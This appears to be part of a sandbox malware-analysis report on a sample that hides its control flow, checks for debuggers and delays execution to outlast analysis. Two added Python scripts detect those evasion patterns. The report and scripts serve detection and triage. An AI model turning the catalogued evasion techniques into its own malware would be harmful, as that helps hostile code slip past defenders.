                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E8E01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E9C09E push esi; ret 0_2_00E9C0A0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E9C187 push edi; ret 0_2_00E9C189
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EDC8BC push esi; ret 0_2_00EDC8BE
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E96B05 push ecx; ret 0_2_00E96B18
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EBB2B1 push FFFFFF8Bh; iretd 0_2_00EBB2B3
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E9BDAA push edi; ret 0_2_00E9BDAC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E9BEC3 push esi; ret 0_2_00E9BEC5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004051D0 push es; iretd 1_2_004051D2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040A9DB push edx; retf 1_2_0040A9DC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403220 push eax; ret 1_2_00403222
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00404A20 push esi; retf 1_2_00404A2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00404A23 push esi; retf 1_2_00404A2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D376 push ds; ret 1_2_0040D388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00415BF3 push esi; retf 1_2_00415BFE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00423413 pushfd ; ret 1_2_00423437
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00406415 push edx; retf 1_2_0040641C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414675 push ebp; retf 1_2_00414688
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040161B push E588A11Fh; iretd 1_2_00401623
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417F6B push ebx; iretd 1_2_00417F71
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004087CB push es; ret 1_2_004087CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx 1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0441646B push es; iretd 2_2_0441646D
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0441BC76 push edx; retf 2_2_0441BC77
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0442BC0D push edx; retf 2_2_0442BC0E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_04415CBB push esi; retf 2_2_04415CC9
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0441E611 push ds; ret 2_2_0441E623
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_04426E8E push esi; retf 2_2_04426E99
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00ED8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00ED8111
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E8EB42
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E9123A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
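The push reg; ret, push imm; iretd and pushfd; ret entries above are control-flow obfuscation (the "return" consumes a value that was just pushed, so the real target is hidden from a linear disassembler), and the anti-debugging entries later in this section list the same sample's fs:[30h] PEB reads, rdtsc timing checks and syscall interceptors. The scanner below is an added example, not part of the Joe Sandbox report and not the sample's code: it flags those byte patterns in a raw code buffer so a dumped .text section or an unpacked memory region can be triaged offline. The pattern set, labels and the hand-assembled SAMPLE bytes are constructed for this example. Treat isolated hits as weak signals: 0F 31 and 5x C3 also occur by chance in data, so run it over code sections only and weigh the per-label counts rather than any single match.

```python
"""Static triage scanner for the instruction-level evasion patterns listed in
this section: push/ret control-flow obfuscation, fs:[30h] PEB reads, rdtsc
timing checks and x64 syscall stubs.  Pattern set and sample bytes are
constructed for this example; they are not the sandbox's own signatures."""
import re
from typing import Dict, List, Tuple

Hit = Tuple[int, str, str]  # (offset, label, matched bytes as hex)

# PUSH r32 (50..57) and PUSH sreg (06 es, 0E cs, 16 ss, 1E ds)
_PUSH_REG = rb"[\x50-\x57\x06\x0e\x16\x1e]"
# PUSH imm8 (6A ib) and PUSH imm32 (68 id)
_PUSH_IMM = rb"(?:\x6a.|\x68.{4})"
# PUSHFD (9C) and PUSHAD (60)
_PUSH_ALL = rb"[\x9c\x60]"
# RET (C3), RETF (CB), IRETD (CF): the "return" that consumes the pushed value
_RET = rb"[\xc3\xcb\xcf]"

PATTERNS = [
    ("push/ret control-flow obfuscation",
     re.compile(rb"(?:" + _PUSH_REG + rb"|" + _PUSH_IMM + rb"|" + _PUSH_ALL + rb")" + _RET,
                re.DOTALL)),
    # mov eax, fs:[30h] = 64 A1 30 00 00 00
    # mov r32, fs:[30h] = 64 8B <modrm mod=00 rm=101> 30 00 00 00
    ("PEB read via fs:[30h]",
     re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")),
    # rdtsc = 0F 31
    ("rdtsc timing check", re.compile(rb"\x0f\x31")),
    # mov r10, rcx ; mov eax, imm32 ; ... ; syscall  (x64 direct-syscall stub)
    ("x64 syscall stub",
     re.compile(rb"\x4c\x8b\xd1\xb8..\x00\x00.{0,24}?\x0f\x05", re.DOTALL)),
]


def scan(code: bytes, base: int = 0) -> List[Hit]:
    """Return every pattern hit in `code`, sorted by address (`base` + offset)."""
    hits: List[Hit] = []
    for label, pat in PATTERNS:
        for m in pat.finditer(code):
            hits.append((base + m.start(), label, m.group().hex()))
    hits.sort()
    return hits


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per label; the counts are what a triage verdict should weigh."""
    counts: Dict[str, int] = {}
    for _, label, _ in hits:
        counts[label] = counts.get(label, 0) + 1
    return counts


# Hand-assembled sample (constructed for this example, not bytes from the analysed binary).
SAMPLE = (
    b"\x55\x8b\xec"                        # push ebp; mov ebp, esp   (benign prologue)
    b"\x64\xa1\x30\x00\x00\x00"            # mov eax, fs:[30h]        (PEB)
    b"\x8a\x40\x02"                        # mov al, [eax+2]          (PEB.BeingDebugged)
    b"\x0f\x31"                            # rdtsc
    b"\x56\xc3"                            # push esi; ret
    b"\x68\x1f\xa1\x88\xe5\xcf"            # push 0E588A11Fh; iretd
    b"\x64\x8b\x0d\x30\x00\x00\x00"        # mov ecx, fs:[30h]
    b"\x4c\x8b\xd1\xb8\x18\x00\x00\x00"    # mov r10, rcx; mov eax, 18h
    b"\x0f\x05\xc3"                        # syscall; ret
)

if __name__ == "__main__":
    for addr, label, raw in scan(SAMPLE, base=0x00401000):
        print(f"{addr:08x}  {label:36s} {raw}")
    print(summarize(scan(SAMPLE)))
```

Pass `base=` as the image base or the dump's load address so the reported offsets line up with the addresses in the report's Code function entries. The syscall pattern is the x64 stub shape; in a 32-bit image such as this sample, a hit for it would point at a WOW64 transition or an injected 64-bit region rather than the image's own code.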

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\KSts9xW7qy.exeAPI/Special instruction interceptor: Address: 17CF624
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeEvaded block: after key decision (graph_0-94636)
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeAPI coverage: 5.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\winrs.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\winrs.exe TID: 2200Thread sleep count: 49 > 30
                Source: C:\Windows\SysWOW64\winrs.exe TID: 2200Thread sleep time: -98000s >= -30000s
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -48000s >= -30000s
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -31000s >= -30000s
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
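The thread-sleep entries above (sleep count > 30, cumulative sleep time >= 30000) are a sandbox-evasion heuristic: a thread that sleeps often or for long stretches is trying to outlast the analysis window. The negative numbers follow the NtDelayExecution convention, where a negative DelayInterval is a relative delay in 100-ns units and a positive one is an absolute system time; that the report's values map to milliseconds this way is my assumption, not something the page states. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed API trace, converts the intervals to milliseconds, aggregates them per thread and applies the same two thresholds. The trace format and the thread IDs 4444 and 5555 are invented for the example; TID 2200 is populated with 49 two-second delays so that it reproduces the 49 / 98000 pair reported for winrs.exe above.

```python
"""Per-thread sleep aggregation over a constructed sandbox API trace.
Flags threads that sleep too often or too long, using the thresholds the
report entries above apply (count > 30, cumulative time >= 30000 ms)."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Optional, Tuple

SLEEP_COUNT_THRESHOLD = 30
SLEEP_TIME_THRESHOLD_MS = 30_000

# Constructed trace format (not Joe Sandbox's): one API call per line.
#   tid=<n> api=Sleep ms=<milliseconds>
#   tid=<n> api=NtDelayExecution delay=<DelayInterval in 100-ns units>
LINE_RE = re.compile(
    r"tid=(?P<tid>\d+)\s+api=(?P<api>\w+)"
    r"(?:\s+ms=(?P<ms>\d+))?(?:\s+delay=(?P<delay>-?\d+))?"
)


class ThreadSleep(NamedTuple):
    count: int           # relative sleeps seen on the thread
    total_ms: float      # their cumulative duration in milliseconds
    absolute_waits: int  # positive DelayInterval values: absolute time, not summed


def delay_to_ms(delay_100ns: int) -> Optional[float]:
    """NtDelayExecution: negative = relative delay in 100-ns units,
    positive = absolute system time, which cannot be summed as a duration."""
    if delay_100ns < 0:
        return -delay_100ns / 10_000.0
    return None


def aggregate(lines: Iterable[str]) -> Dict[int, ThreadSleep]:
    """Fold the trace into per-thread sleep statistics."""
    count: Dict[int, int] = defaultdict(int)
    total: Dict[int, float] = defaultdict(float)
    absolute: Dict[int, int] = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line
        tid = int(m.group("tid"))
        api = m.group("api")
        if api == "Sleep" and m.group("ms") is not None:
            ms: Optional[float] = float(m.group("ms"))
        elif api == "NtDelayExecution" and m.group("delay") is not None:
            ms = delay_to_ms(int(m.group("delay")))
            if ms is None:
                absolute[tid] += 1  # absolute wait: recorded, not counted as a sleep
                continue
        else:
            continue  # unrelated API call
        count[tid] += 1
        total[tid] += ms
    tids = set(count) | set(absolute)
    return {t: ThreadSleep(count[t], total[t], absolute[t]) for t in tids}


def flag(stats: Dict[int, ThreadSleep]) -> List[Tuple[int, str]]:
    """Return (tid, reason) pairs, worded like the report entries."""
    findings: List[Tuple[int, str]] = []
    for tid, s in sorted(stats.items()):
        if s.count > SLEEP_COUNT_THRESHOLD:
            findings.append((tid, f"Thread sleep count: {s.count} > {SLEEP_COUNT_THRESHOLD}"))
        if s.total_ms >= SLEEP_TIME_THRESHOLD_MS:
            findings.append((tid, f"Thread sleep time: {s.total_ms:.0f} ms >= {SLEEP_TIME_THRESHOLD_MS} ms"))
    return findings


# Constructed trace: TID 2200 issues 49 relative delays of 2 s (-20,000,000 x 100 ns),
# TID 4444 sleeps briefly five times, TID 5555 waits once on an absolute time.
SAMPLE_TRACE = (
    ["tid=2200 api=NtDelayExecution delay=-20000000"] * 49
    + ["tid=4444 api=Sleep ms=100"] * 5
    + ["tid=5555 api=NtDelayExecution delay=133000000000000000"]
    + ["tid=4444 api=GetTickCount"]
)

if __name__ == "__main__":
    for tid, reason in flag(aggregate(SAMPLE_TRACE)):
        print(f"TID {tid}: {reason}")
```

The absolute-time case is kept separate on purpose: a positive DelayInterval is a point in time, and summing it with relative delays would inflate the total and produce a spurious finding. A thread that only ever waits on absolute times shows up with count 0 and a non-zero absolute_waits, which is worth a manual look but is not the same evidence as the entries above.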
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EB6CA9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00EB60DD
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00EB63F9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EBEB60
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EBF5FA
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF56F FindFirstFileW,FindClose,0_2_00EBF56F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1B2F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1C8A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EC1F94
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029CC3A0 FindFirstFileW,FindNextFileW,FindClose,3_2_029CC3A0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E8DDC0
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3520106258.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2071988891.000001A17733C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\winrs.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417543 LdrLoadDll,1_2_00417543
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6AAF BlockInput,0_2_00EC6AAF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E73D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73D19
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00EA3920
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8E01E LoadLibraryA,GetProcAddress,0_2_00E8E01E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CE270 mov eax, dword ptr fs:[00000030h]0_2_017CE270
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CF8F0 mov eax, dword ptr fs:[00000030h]0_2_017CF8F0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CF890 mov eax, dword ptr fs:[00000030h]0_2_017CF890
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
